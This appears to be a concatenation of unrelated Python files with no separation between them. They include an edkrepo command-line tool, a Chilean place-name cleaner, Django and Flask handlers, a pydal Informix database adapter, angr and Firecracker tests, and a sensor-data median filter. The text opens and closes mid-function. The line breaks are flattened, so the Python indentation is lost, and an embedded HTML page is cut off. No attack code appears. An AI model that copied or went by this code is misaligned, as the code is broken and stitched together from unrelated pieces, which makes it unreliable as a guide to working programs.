choices.append(choice.get('choice')) help_text += '\n' + choice.get('help-text') subparser_name.add_argument(arg.get('name'), choices=choices, help=help_text) #check if non-required positional elif not arg.get('required'): subparser_name.add_argument(arg.get('name'), nargs='?', help=arg.get('help-text')) else: subparser_name.add_argument(arg.get('name'), help=arg.get('help-text')) #add non-positional args for arg in non_positional_args: if 'action' in arg: arg_action = arg.get('action') else: arg_action = 'store_true' if 'short-name' in arg: short_name = '-' + arg['short-name'] subparser_name.add_argument(short_name, ('--' + arg.get('name')), action=arg_action, help=arg.get('help-text')) if 'nargs' in arg: subparser_name.add_argument(short_name, ('--' + arg.get('name')), action=arg_action, nargs=arg.get('nargs'), help=arg.get('help-text')) elif 'nargs' in arg: subparser_name.add_argument(('--' + arg.get('name')), action=arg_action, nargs=arg.get('nargs'), help=arg.get('help-text')) else: subparser_name.add_argument(('--' + arg.get('name')), action=arg_action, help=arg.get('help-text')) return parser command_completion_script_header='''#!/usr/bin/env bash # ## @file edkrepo_completions.sh # # Automatically generated please DO NOT modify !!! # ''' def generate_command_completion_script(script_filename, parser): import edkrepo.command_completion_edkrepo as completion commands = [] for action in parser._positionals._group_actions: if action.choices is not None: commands = [c for c in action.choices] break commands = sorted(commands) commands_with_3rd_param_completion = [c for c in completion.command_completions if c in commands] commands_with_3rd_param_completion = sorted(commands_with_3rd_param_completion) with open(script_filename, 'w') as f: f.write(command_completion_script_header) if sys.platform == "win32": command_completion_path = os.path.dirname(sys.executable) command_completion_path = os.path.join(command_completion_path, 'Scripts', "command_completion_edkrepo.exe") if not os.path.isfile(command_completion_path): print('command_completion_edkrepo.exe not found') return command_completion_path = get_actual_path(command_completion_path) (drive, path) = os.path.splitdrive(command_completion_path) command_completion_path = '/{}{}'.format(drive.replace(':','').lower(), path.replace('\\','/')) f.write("export command_completion_edkrepo_file='{}'\n".format(command_completion_path)) f.write('alias command_completion_edkrepo="$command_completion_edkrepo_file"\n') f.write('_edkrepo_completions() {\n if [ "${#COMP_WORDS[@]}" -eq "2" ]; then\n') f.write(' COMPREPLY=($(compgen -W "{}" -- "${{COMP_WORDS[1]}}"))\n'.format(' '.join(commands))) if len(commands_with_3rd_param_completion) > 0: f.write(' elif [ "${#COMP_WORDS[@]}" -eq "3" ]; then\n') first_loop = True for command in commands_with_3rd_param_completion: if first_loop: f.write(' if [ "${{COMP_WORDS[1]}}" == "{}" ]; then\n'.format(command)) first_loop = False else: f.write(' elif [ "${{COMP_WORDS[1]}}" == "{}" ]; then\n'.format(command)) f.write(' COMPREPLY=($(compgen -W "$(command_completion_edkrepo ${COMP_WORDS[1]})" -- "${COMP_WORDS[2]}"))\n') if len(commands_with_3rd_param_completion) > 0: f.write(' fi\n') f.write(' fi\n}\n\n') if len(commands_with_3rd_param_completion) > 0: if sys.platform == "win32": f.write('if [ -x "$(command -v edkrepo)" ] && [ -x "$(command -v $command_completion_edkrepo_file)" ]; then\n') else: f.write('if [ -x "$(command -v edkrepo)" ] && [ -x "$(command -v command_completion_edkrepo)" ]; then\n') else: f.write('if [ -x "$(command -v edkrepo)" ]; then\n') f.write(' complete -F _edkrepo_completions edkrepo\nfi\n') def main(): start_time = dt.datetime.now() command = command_factory.create_composite_command() config = {} try: config["cfg_file"] = config_factory.GlobalConfig() config["user_cfg_file"] = config_factory.GlobalUserConfig() except EdkrepoGlobalConfigNotFoundException as e: print("Error: {}".format(str(e))) return e.exit_code except EdkrepoConfigFileInvalidException as e: print("Error: {}".format(str(e))) return e.exit_code parser = generate_command_line(command) if len(sys.argv) <= 1: parser.print_help() return 1 if sys.argv[1] == 'generate-command-completion-script' and len(sys.argv) >= 3: generate_command_completion_script(sys.argv[2], parser) return 0 parsed_args = parser.parse_args() command_name = parsed_args.subparser_name try: command.run_command(command_name, parsed_args, config) except EdkrepoWarningException as e: print("Warning: {}".format(str(e))) return e.exit_code except EdkrepoException as e: if parsed_args.verbose: traceback.print_exc() print("Error: {}".format(str(e))) return e.exit_code except GitCommandError as e: if parsed_args.verbose: traceback.print_exc() out_str = '' out_str = ' '.join(e.command) print(GIT_CMD_ERROR.format(out_str)) print(e.stdout.strip()) print(e.stderr.strip()) return e.status except KeyboardInterrupt: if parsed_args.verbose: traceback.print_exc() print(KEYBOARD_INTERRUPT) return 1 except Exception as e: if parsed_args.verbose: traceback.print_exc() print("Error: {}".format(str(e))) return 1 if parsed_args.performance: print('\nExecution Time: {}'.format(dt.datetime.now() - start_time)) return 0 if __name__ == "__main__": try: sys.exit(main()) except Exception as e: traceback.print_exc() sys.exit(1) import pandas as pd import numpy as np import unidecode comunas = pd.read_csv('./data/comuna.csv') comunas_name = np.array([unidecode.unidecode(x).lower() for x in comunas['name'].to_numpy()],dtype=str) comunas_id = np.array(comunas['id'].to_numpy(), dtype=int) comuna_code = dict(zip(comunas_name, comunas_id)) comunas_fix = { 'isla de pascua': 'isla de pascua', 'trehuaco' : 'treguaco', 'coccepcion' : 'concepcion', 'conce' : 'concepcion', 'concepcion.' : 'concepcion', 'santiago centro' : 'santiago', 'caleta tortel' : 'tortel', 'puente' : 'puente alto', 'san vicente de tagua tagua' : 'san vicente', 'san vicente tagua tagua' : 'san vicente', 'marchigue' : 'marchihue', 'coihaique' : 'coyhaique', 'coyihaque' : 'coyhaique', 'haulpen' : 'hualpen', 'vina': 'vina del mar', 'la serena': 'la serena', 'huechurabs' : 'huechuraba', 'providenica' : 'providencia', 'providenca' : 'providencia', 'cowuimbo' : 'coquimbo', 'comuna de putre' : 'putre', 'x region, chile' : 'nr', 'v region' : 'nr', 'alto hospicii' : 'alto hospicio', 'san miguel.' : 'san miguel', 'pozo amonte' : 'pozo almonte', 'til til' : 'tiltil', 'qta normal' : 'quinta normal', 'quinta norma' : 'quinta normal', 'milina' : 'molina', 'batuco' : 'lampa', 'la visterna' : 'la cisterna', '"puerto montt' : 'puerto montt', 'extranjero' : 'nr', 'cerrillos.' : 'cerrillos', 'maipu (mientras)..' : 'maipu', 'colchagua': 'nr', 'san antonio comuna de cartagena': 'cartagena', 'quemchi chiloe-' : 'quemchi', 'rocas de santo domingo' : 'santo domingo', 'la calera' : 'calera', 'coyhique' : 'coyhaique', 'cancun' : 'nr', 'estados unidos' : 'nr', 'gladstone' : 'nr', 'qjillota' : 'quillota', 'pac' : 'pedro aguirre cerda', 'paihuano' : 'paiguano', 'puerto aysen' : 'aysen', 'provincia' : 'nr', 'santioago' : 'santiago', 'quilpue (belloto)' : 'quilpue', 'nan' : 'nr' } def get_comunas_id(x, col): try: x[col] = comuna_code[x[col]] except KeyError: x[col] = comuna_code['nr'] return x def fix_location_online(x): if pd.isna(x['Comuna']): if pd.isna(x['Comuna.1']): x['Comuna'] = '' else: x['Comuna'] = x['Comuna.1'] try: x['Comuna'] = comuna_code[unidecode.unidecode(x['Comuna']).lower()] except KeyError: x['Comuna'] = comuna_code[comunas_fix[unidecode.unidecode(x['Comuna']).lower()]] return x def fix_location(x): if x['comuna'] == 'nr': x['comuna'] = 1 if pd.isna(x['comuna']): x['comuna'] = 1 return x import pytest from subprocess import call import os import yaml """ test metafunc this test will test metafunc. this test will also show how to run tests where failure is expected (i.e., checking that we handle invalid parameters). """ class TestCLI: """ simple metafunc test class This uses the subprocess PIPE var to capture system input and output, since we are running metafunc from the command line directly using subprocess. """ @classmethod def setup_class(self): """ setup any state specific to the execution of the given class (which usually contains tests). """ def testSetup(self): """ test workflow """ command = ["metafunc", "setup", "-n", "test"] pwd = os.path.abspath(os.path.dirname(__file__)) rc = call(command, cwd=pwd) assert rc == 0 @pytest.mark.parametrize( "test_input_config,expected", [("test/config.yaml", 0), ("config_wrong.yaml", 1)], ) def test_run(self, test_input_config, expected): """ test workflow """ command_prefix = ["metafunc", "run"] pwd = os.path.abspath(os.path.dirname(__file__)) command = command_prefix + [test_input_config] rc = call(command, cwd=pwd) assert rc == expected # clean up run dat # config files here specify a resultdir where the snakemake run results # will be written to. Here we find it for each indifivual run and delete # the directory after successful runs. config_data = yaml.safe_load(open(os.path.join(pwd, test_input_config))) print(config_data) resultdir = config_data["resultdir"] rc = call(["rm", "-rf", resultdir], cwd=pwd) assert rc == 0 @classmethod def teardown_class(self): """ teardown any state that was previously setup with a call to setup_class. """ pwd = os.path.abspath(os.path.dirname(__file__)) rc = call(["rm", "-rf", "test"], cwd=pwd) assert rc == 0 <gh_stars>0 from datetime import datetime from django.http import Http404, JsonResponse from currency_converter.exchange_rates import convert_amount def convert(request): """ Handles GET => /convert """ try: if request.method == 'GET': amount = float(request.GET.get('amount', 0)) src_currency = request.GET.get('src_currency', 'EUR') dest_currency = request.GET.get('dest_currency', 'EUR') reference_date = request.GET.get( 'reference_date', datetime.now().date(), ) converted = convert_amount( amount, reference_date, src_currency, dest_currency, ) response = { 'amount': converted, 'currency': dest_currency, } return JsonResponse(response) else: raise Http404('Invalid request') except Exception: raise Http404('Invalid request - check input. \ Example:\ amount=20&\ src_currency=USD&\ dest_currency=GBP&\ reference_date=2020-05-22') from __future__ import absolute_import from functools import wraps from datetime import datetime color_codes = { 'INFO': '\033[94m', 'WARNING': '\033[93m', 'SUCCESS': '\033[92m', 'ERROR': '\033[91m', } def log_method(func): @wraps(func) def wrapped(instance, value, *args, **kwargs): value = value.format(*args, **kwargs) return func(instance, value) return wrapped def print_with_color(value, color): value = "{color} [{time}] {value}\033[0m".format( color=color_codes[color], time=datetime.now().strftime("%H:%M:%S"), value=value, ) print value class Logger(object): @log_method def info(self, value): print_with_color(value, 'INFO') @log_method def warning(self, value): print_with_color(value, 'WARNING') @log_method def success(self, value): print_with_color(value, 'SUCCESS') @log_method def error(self, value): print_with_color(value, 'ERROR') """text. Usage: text clean-purpose [options] <purpose> Options: --debug Debug messages. -h --help Help message --ie=encoding Input encoding [default: utf-8] --oe=encoding Output encoding [default: utf-8] -o --output=<file> Output filename, default output to stdout --verbose Verbose messages. """ import codecs import logging import os from os import write from os.path import join, split import re import signal from six import b, text_type class PurposeProcessor(object): """Text processor for company purpose.""" def __init__(self): """Setup pattern and logger.""" self.logger = logging.getLogger(__name__ + '.PurposeProcessor') self.logger.addHandler(logging.NullHandler()) self.ignore_pattern = re.compile( u""" Selskabets\sform\xe5l\ser\sat\sdrive| Selskabets\sform\xe5l\ser| og\sdermed\sbesl\xe6gtet\svirksomhed| \.$ """, flags=re.UNICODE | re.VERBOSE) self.stop_words = self.read_stop_words() stop_words = sorted(self.stop_words, key=len, reverse=True) regex = '|'.join((re.escape(word) for word in stop_words)) regex = r'\b(?:' + regex + r')\b' self.stop_words_pattern = re.compile(regex, flags=re.UNICODE) def clean(self, text): """Return cleaned purpose text. Parameters ---------- text : str String with purpose Returns ------- cleaned : str String with cleaned purpose Description ----------- Remove the following fragments: "Selskabets formaal er at drive" "Selskabets formaal er" "og anden dermed beslaegtet virksomhed" "dermed beslaegtet virksomhed" "hermed beslaegtet virksomhed" """ cleaned = self.stop_words_pattern.sub('', text).strip() return cleaned def read_stop_words(self): """Read purpose stop words from data file. Returns ------- stop_words : list of str List with stop words Examples -------- >>> purpose_processor = PurposeProcessor() >>> stop_words = purpose_processor.read_stop_words() >>> 'dermed' in stop_words True """ filename = join(split(__file__)[0], 'data', 'purpose_stop_words.txt') self.logger.info('Reading stop words from {}'.format(filename)) stop_words = [] with codecs.open(filename, encoding='utf-8') as fid: for line in fid: stop_words.append(line.strip()) return stop_words def main(): """Handle command-line interface.""" from docopt import docopt arguments = docopt(__doc__) logging_level = logging.WARN if arguments['--debug']: logging_level = logging.DEBUG elif arguments['--verbose']: logging_level = logging.INFO logger = logging.getLogger() logger.setLevel(logging_level) logging_handler = logging.StreamHandler() logging_handler.setLevel(logging_level) logging_formatter = logging.Formatter( '%(asctime)s - %(name)s - %(levelname)s - %(message)s') logging_handler.setFormatter(logging_formatter) logger.addHandler(logging_handler) if arguments['--output']: output_filename = arguments['--output'] output_file = os.open(output_filename, os.O_RDWR | os.O_CREAT) else: # stdout output_file = 1 output_encoding = arguments['--oe'] input_encoding = arguments['--ie'] # Ignore broken pipe errors signal.signal(signal.SIGPIPE, signal.SIG_DFL) if arguments['clean-purpose']: purpose = arguments['<purpose>'] if not isinstance(purpose, text_type): purpose = purpose.decode(input_encoding) processor = PurposeProcessor() cleaned_purpose = processor.clean(purpose) write(output_file, cleaned_purpose.encode(output_encoding) + b('\n')) if __name__ == '__main__': main() <filename>lib/streamlit/url_util.py # -*- coding: utf-8 -*- # Copyright 2018-2020 Streamlit Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Python 2/3 compatibility from __future__ import print_function, division, unicode_literals, absolute_import from streamlit.compatibility import setup_2_3_shims setup_2_3_shims(globals()) # flake8: noqa import re import urllib # Regular expression for process_gitblob_url _GITBLOB_RE = re.compile( r"(?P<base>https:\/\/?(gist.)?github.com\/)" r"(?P<account>([\w\.]+\/){1,2})" r"(?P<blob_or_raw>(blob|raw))?" r"(?P<suffix>(.+)?)" ) def process_gitblob_url(url): """Check url to see if it describes a GitHub Gist "blob" URL. If so, returns a new URL to get the "raw" script. If not, returns URL unchanged. """ # Matches github.com and gist.github.com. Will not match githubusercontent.com. # See this regex with explainer and sample text here: https://regexr.com/4odk3 match = _GITBLOB_RE.match(url) if match: mdict = match.groupdict() # If it has "blob" in the url, replace this with "raw" and we're done. if mdict["blob_or_raw"] == "blob": return "{base}{account}raw{suffix}".format(**mdict) # If it is a "raw" url already, return untouched. if mdict["blob_or_raw"] == "raw": return url # It's a gist. Just tack "raw" on the end. return url + "/raw" return url def get_hostname(url): """Return the hostname of a URL (with or without protocol).""" # Just so urllib can parse the URL, make sure there's a protocol. # (The actual protocol doesn't matter to us) if "://" not in url: url = "http://%s" % url parsed = urllib.parse.urlparse(url) return parsed.hostname def print_url(title, url): """Pretty-print a URL on the terminal.""" import click click.secho(" %s: " % title, nl=False, fg="blue") click.secho(url, bold=True) <reponame>arvindkarir/python-pandas-code<gh_stars>0 '''check input for integers, do their square. If it is a string, print string (which may be true for all cases but integers''' def readVal(valType, requestMsg, errorMsg): while True: val = raw_input(requestMsg + ' ') try: val = valType(val) #if this tries to find valType int of a string, it generates an error, so goes to except block return val except ValueError: print val, errorMsg val = readVal(int, 'Enter integer:', 'is not an integer') #this will invoke the readVal function for integers print 'square of', val, 'is:', val**2 print 'now evaluating a string' val = readVal(str, 'Enter a string:', 'is not a string') #this will invoke the readVal function for string print 'just another string', val # Copyright 2020-2021 <NAME>. All rights reserved. # This project is licensed under the terms of the MIT License. from youpy.code.english.everything import * def when_program_start(): console.print("program is starting") shared_variable.score = 1 shared_variable.score.hide() switch_backdrop_to("Welcome") console.print("done initializing the program") def when_space_key_pressed(): shared_variable.score.show() switch_backdrop_to("InGame") run(locals()) <reponame>kjkuan/pydal # -*- coding: utf-8 -*- import datetime import re from .._globals import IDENTITY from .base import BaseAdapter class InformixAdapter(BaseAdapter): drivers = ('informixdb',) types = { 'boolean': 'CHAR(1)', 'string': 'VARCHAR(%(length)s)', 'text': 'BLOB SUB_TYPE 1', 'json': 'BLOB SUB_TYPE 1', 'password': 'VARCHAR(%(length)s)', 'blob': 'BLOB SUB_TYPE 0', 'upload': 'VARCHAR(%(length)s)', 'integer': 'INTEGER', 'bigint': 'BIGINT', 'float': 'FLOAT', 'double': 'DOUBLE PRECISION', 'decimal': 'NUMERIC(%(precision)s,%(scale)s)', 'date': 'DATE', 'time': 'CHAR(8)', 'datetime': 'DATETIME', 'id': 'SERIAL', 'reference': 'INTEGER REFERENCES %(foreign_key)s ON DELETE %(on_delete_action)s', 'list:integer': 'BLOB SUB_TYPE 1', 'list:string': 'BLOB SUB_TYPE 1', 'list:reference': 'BLOB SUB_TYPE 1', 'big-id': 'BIGSERIAL', 'big-reference': 'BIGINT REFERENCES %(foreign_key)s ON DELETE %(on_delete_action)s', 'reference FK': 'REFERENCES %(foreign_key)s ON DELETE %(on_delete_action)s CONSTRAINT FK_%(table_name)s_%(field_name)s', 'reference TFK': 'FOREIGN KEY (%(field_name)s) REFERENCES %(foreign_table)s (%(foreign_key)s) ON DELETE %(on_delete_action)s CONSTRAINT TFK_%(table_name)s_%(field_name)s', } def RANDOM(self): return 'Random()' def NOT_NULL(self,default,field_type): return 'DEFAULT %s NOT NULL' % self.represent(default,field_type) def select_limitby(self, sql_s, sql_f, sql_t, sql_w, sql_o, limitby): if limitby: (lmin, lmax) = limitby fetch_amt = lmax - lmin dbms_version = int(self.connection.dbms_version.split('.')[0]) if lmin and (dbms_version >= 10): # Requires Informix 10.0+ sql_s += ' SKIP %d' % (lmin, ) if fetch_amt and (dbms_version >= 9): # Requires Informix 9.0+ sql_s += ' FIRST %d' % (fetch_amt, ) return 'SELECT %s %s FROM %s%s%s;' % (sql_s, sql_f, sql_t, sql_w, sql_o) def represent_exceptions(self, obj, fieldtype): if fieldtype == 'date': if isinstance(obj, (datetime.date, datetime.datetime)): obj = obj.isoformat()[:10] else: obj = str(obj) return "to_date('%s','%%Y-%%m-%%d')" % obj elif fieldtype == 'datetime': if isinstance(obj, datetime.datetime): obj = obj.isoformat()[:19].replace('T',' ') elif isinstance(obj, datetime.date): obj = obj.isoformat()[:10]+' 00:00:00' else: obj = str(obj) return "to_date('%s','%%Y-%%m-%%d %%H:%%M:%%S')" % obj return None REGEX_URI = re.compile('^(?P<user>[^:@]+)(\:(?P<password>[^@]*))?@(?P<host>[^\:/]+)(\:(?P<port>[0-9]+))?/(?P<db>.+)$') def __init__(self,db,uri,pool_size=0,folder=None,db_codec ='UTF-8', credential_decoder=IDENTITY, driver_args={}, adapter_args={}, do_connect=True, after_connection=None): self.db = db self.dbengine = "informix" self.uri = uri if do_connect: self.find_driver(adapter_args,uri) self.pool_size = pool_size self.folder = folder self.db_codec = db_codec self._after_connection = after_connection self.find_or_make_work_folder() ruri = uri.split('://',1)[1] m = self.REGEX_URI.match(ruri) if not m: raise SyntaxError( "Invalid URI string in DAL: %s" % self.uri) user = credential_decoder(m.group('user')) if not user: raise SyntaxError('User required') password = credential_decoder(m.group('password')) if not password: password = '' host = m.group('host') if not host: raise SyntaxError('Host name required') db = m.group('db') if not db: raise SyntaxError('Database name required') user = credential_decoder(user) password = <PASSWORD>(password) dsn = '%s@%s' % (db,host) driver_args.update(user=user,password=password) def connector(dsn=dsn,driver_args=driver_args): return self.driver.connect(dsn,**driver_args) self.connector = connector if do_connect: self.reconnect() def execute(self,command): if command[-1:]==';': command = command[:-1] return self.log_execute(command) def lastrowid(self,table): return self.cursor.sqlerrd[1] class InformixSEAdapter(InformixAdapter): """ work in progress """ def select_limitby(self, sql_s, sql_f, sql_t, sql_w, sql_o, limitby): return 'SELECT %s %s FROM %s%s%s;' % \ (sql_s, sql_f, sql_t, sql_w, sql_o) def rowslice(self,rows,minimum=0,maximum=None): if maximum is None: return rows[minimum:] return rows[minimum:maximum] <filename>aldryn_gallery/migrations/0002_galleryplugin_extra_styles.py # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('aldryn_gallery', '0001_initial'), ] operations = [ migrations.AddField( model_name='galleryplugin', name='extra_styles', field=models.CharField(help_text='An arbitrary string of CSS classes to add', max_length=50, verbose_name='Extra styles', blank=True), preserve_default=True, ), ] import logging import os import nose.tools import archinfo import angr from angr.calling_conventions import SimStackArg, SimRegArg, SimCCCdecl, SimCCSystemVAMD64 test_location = os.path.join(os.path.dirname(os.path.realpath(str(__file__))), '..', '..', 'binaries', ) def run_fauxware(arch, function_and_cc_list): binary_path = os.path.join(test_location, 'tests', arch, 'fauxware') fauxware = angr.Project(binary_path, auto_load_libs=False) cfg = fauxware.analyses.CFG() for func_name, expected_cc in function_and_cc_list: authenticate = cfg.functions[func_name] _ = fauxware.analyses.VariableRecoveryFast(authenticate) cc_analysis = fauxware.analyses.CallingConvention(authenticate) cc = cc_analysis.cc nose.tools.assert_equal(cc, expected_cc) def run_cgc(binary_name): binary_path = os.path.join(test_location, '..', 'binaries-private', 'cgc_qualifier_event', 'cgc', binary_name) project = angr.Project(binary_path) categorization = project.analyses.FunctionCategorizationAnalysis() tag_manager = categorization.function_tag_manager print "INPUT:", map(hex, tag_manager.input_functions()) print "OUTPUT:", map(hex, tag_manager.output_functions()) def test_fauxware(): amd64 = archinfo.arch_from_id('amd64') args = { 'i386': [ ('authenticate', SimCCCdecl( archinfo.arch_from_id('i386'), args=[SimStackArg(4, 4), SimStackArg(8, 4)], sp_delta=4 ) ), ], 'x86_64': [ ('authenticate', SimCCSystemVAMD64( amd64, args=[SimRegArg('rdi', 8), SimRegArg('rsi', 8)], sp_delta=8 ) ), ], } for arch, lst in args.iteritems(): yield run_fauxware, arch, lst # def test_cgc(): def disabled_cgc(): # Skip this test since we do not have the binaries-private repo cloned on Travis CI. binaries = [ '002ba801_01', '01cf6c01_01', ] for binary in binaries: yield run_cgc, binary def run_all(): logging.getLogger("angr.analyses.variable_recovery.variable_recovery_fast").setLevel(logging.DEBUG) for args in test_fauxware(): func, args = args[0], args[1:] func(*args) #for args in test_cgc(): # func, args = args[0], args[1:] # func(*args) if __name__ == "__main__": run_all() # Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. # SPDX-License-Identifier: Apache-2.0 """Basic tests scenarios for snapshot save/restore.""" import platform import pytest from framework.microvms import VMNano import host_tools.network as net_tools # pylint: disable=import-error @pytest.mark.skipif( platform.machine() != "x86_64", reason="Not supported yet." ) def test_pause_resume(bin_cloner_path): """Test scenario: boot/pause/resume.""" vm_instance = VMNano.spawn(bin_cloner_path) microvm = vm_instance.vm # Pausing the microVM before being started is not allowed. response = microvm.vm.patch(state='Paused') assert microvm.api_session.is_status_bad_request(response.status_code) # Resuming the microVM before being started is also not allowed. response = microvm.vm.patch(state='Resumed') assert microvm.api_session.is_status_bad_request(response.status_code) microvm.start() ssh_connection = net_tools.SSHConnection(microvm.ssh_config) # Verify guest is active. exit_code, _, _ = ssh_connection.execute_command("ls") assert exit_code == 0 # Pausing the microVM after it's been started is successful. response = microvm.vm.patch(state='Paused') assert microvm.api_session.is_status_no_content(response.status_code) # Verify guest is no longer active. exit_code, _, _ = ssh_connection.execute_command("ls") assert exit_code != 0 # Pausing the microVM when it is already `Paused` is allowed # (microVM remains in `Paused` state). response = microvm.vm.patch(state='Paused') assert microvm.api_session.is_status_no_content(response.status_code) # Resuming the microVM is successful. response = microvm.vm.patch(state='Resumed') assert microvm.api_session.is_status_no_content(response.status_code) # Verify guest is active again. exit_code, _, _ = ssh_connection.execute_command("ls") assert exit_code == 0 # Resuming the microVM when it is already `Resumed` is allowed # (microVM remains in the running state). response = microvm.vm.patch(state='Resumed') assert microvm.api_session.is_status_no_content(response.status_code) # Verify guest is still active. exit_code, _, _ = ssh_connection.execute_command("ls") assert exit_code == 0 microvm.kill() class BadRespond: ''' This class sends an error response if a path is not defined in the UServer.__router_paths. :response: This is a Response object. :request: This is a Request object. ''' def __init__(self, response, request): self.responseObject = response self.requestObject = request self.responseObject.status = 500 self.bad_request_html = ''' <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Bad Request

{} not supported on {} path.

'''.format(self.requestObject.method, self.requestObject.path) def send(self): accept_type = self.requestObject.header('Accept') if(accept_type != None): if(accept_type == 'text/html' or accept_type == '*/*'): self.responseObject.send_html(self.bad_request_html) elif(accept_type == 'application/json'): self.responseObject.send_json({ 'error': '{} not supported on {} path.'.format(self.requestObject.method, self.requestObject.path)}) else: self.responseObject.send('{} not supported on {} path.'.format(self.requestObject.method, self.requestObject.path)) else: self.responseObject.send()#!/usr/bin/env python3 # coding=UTF-8 # # BSD 2-Clause License # # Copyright (c) 2020, # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # Median filter for AX3 CSV data # # Axes: # X is the long axis # Y is the across-the-device axis # Z is across the thickness of the device axis from Row import Row from tkinter import filedialog import argparse import csv import math import numpy as np import os import sys import tkinter as tk from medianfilter import medianFilter class MedianProcessor: def makeOutFile(self, filename): """ Make output filename """ path, name = os.path.split(filename) newName = "median_" + name fullPath = os.path.join(path, newName) print("Output file is", fullPath) return fullPath def process(self, filename, window): """ Process the file """ # Count number of lines in file to get array dimension print(f"Median window size is {window}") print("Count lines in file") count = 0 with open(filename, "rt", newline="\n") as fh: line = fh.readline().strip() while line: row = Row(line) if row.skip: pass else: count += 1 if count % 1000000 == 0: print(f"{count} lines counted") line = fh.readline().strip() # Set initial values of array to match actual field length timestamp = np.array(["YYYY-MM-DD HH:MM:SS.FFF" for _ in range(count)]) x = np.zeros((count,)) y = np.zeros((count,)) z = np.zeros((count,)) print("Read file") firstLine = None with open(filename, "rt", newline="\n") as fh: line = fh.readline().strip() index = 0 while line: row = Row(line) if row.skip: pass else: if firstLine is None: firstLine = row.timestamp timestamp[index] = row.timestamp x[index] = row.val[0] y[index] = row.val[1] z[index] = row.val[2] index += 1 if index % 1000000 == 0: print(f"{index} data lines read") line = fh.readline().strip() print("Calculate x axis medians") medx = medianFilter(x, window, len(x)//50) print("Calculate y axis medians") medy = medianFilter(y, window, len(y)//50) print("Calculate z axis medians") medz = medianFilter(z, window, len(z)//50) outputFilename = self.makeOutFile(filename) lineEnd = "\r\n" with open(outputFilename, "w") as outfile: outfile.write("datetime, x, y, z{}".format(lineEnd)) for index in range(len(timestamp)): outfile.write("{},{:.06f},{:.06f},{:.06f}{}".format( timestamp[index], medx[index], medy[index], medz[index], lineEnd)) return outputFilename def main(): if len(sys.argv) < 2: root = tk.Tk() root.withdraw() filePath = filedialog.askopenfilename( filetypes = [("Comma separated file (CSV) format",".csv")]) window = 7 else: parser = argparse.ArgumentParser(description= "Convert accelerometer file to per second values") parser.add_argument("filename", help="Input filename") parser.add_argument("--window", help="Window size", type=int, default="7") args = parser.parse_args() filePath = args.filename name, extension = os.path.splitext(filePath) window = args.window if window < 0: print(f"Bad value for window, {window}, using 25") window = 7 if window % 2 != 1: print(f"Window size must be odd, {window}, using 25") window = 7 if extension == ".CWA": print("You need the .csv, not the .CWA", file=stderr) os.exit(0) processor = MedianProcessor() processor.process(filePath, window) if __name__ == "__main__": main() Team1157/Scan-Gameclient/client_api.py1-10 from flask import Flask, jsonify, request from datetime import datetime import json from flask_cors import CORS class Event: def __init__(self, event_level: int, event_type: str, extra_data=None): self.event_level = event_level self.event_type = event_type self.extra_data = extra_data self.time = datetime.now() self.is_read = False def mark_read(self): self.is_read = True def get_as_object(self): return {"event_level": self.event_level, "event_type": self.event_type, "time": self.time, "extra_data": self.extra_data} class ApiServer: def __init__(self): with open("conf.json", "r") as f: self.data = json.load(f) self.location_id = self.data["location_id"] self.events = [] def receive_event(self, event_level, event_type, extra_data): print(f"Got event {event_type} at level {event_level} with extra data {extra_data}") self.events.append(Event(event_level=int(event_level), event_type=event_type, extra_data=extra_data)) def get_event_smart(self): for event in self.events: if event.event_level > 0 and not event.is_read: event.mark_read() return event return self.events[-1] app = Flask(__name__) CORS(app) api_server = ApiServer() @app.route("/info/") def info(): return jsonify({"location_id": api_server.location_id}) @app.route("/notify_event/", methods=["POST"]) def notify_event(): data: dict = request.get_json() event_level = data["event_level"] event_type = data["event_type"] if "extra_info" in data.keys(): extra_data = data["extra_info"] else: extra_data = None api_server.receive_event(event_level=event_level, event_type=event_type, extra_data=extra_data) return jsonify(success=True) @app.route("/get_event_smart/") def get_event_smart(): event = api_server.get_event_smart() return jsonify(event.get_as_object()) if __name__ == "__main__": app.run(port=5000) fasiondog/hikyuu_house from hikyuu import PG_NoGoal # 部件作者 author = "fasiondog" # 版本 version = '20200825' def part(): return PG_NoGoal() part.__doc__ = PG_NoGoal.__doc__ if __name__ == '__main__': print(part())naivebayes.py0 from deminer import Board from collections import defaultdict from collections import namedtuple # Naive Bayses solver for MineSweeper # P(M|Window) = P(Window|M)*P(M)/P(Window) # P(M|Window) ~= P(Window|M) # P(M|Windows) ~= P(W1|M)*P(W2|M)*...*P(Wn|M) class Record(object): def __init__(self): # smooth, couse in wrong case you can get 1/2 or 2/3 mines and # virtually never try it again. Solver has to find at least # 150 mines to disregard it over base probal ~= 0.150 self.safe = 1000 self.tries = 1000 def chance(self): return 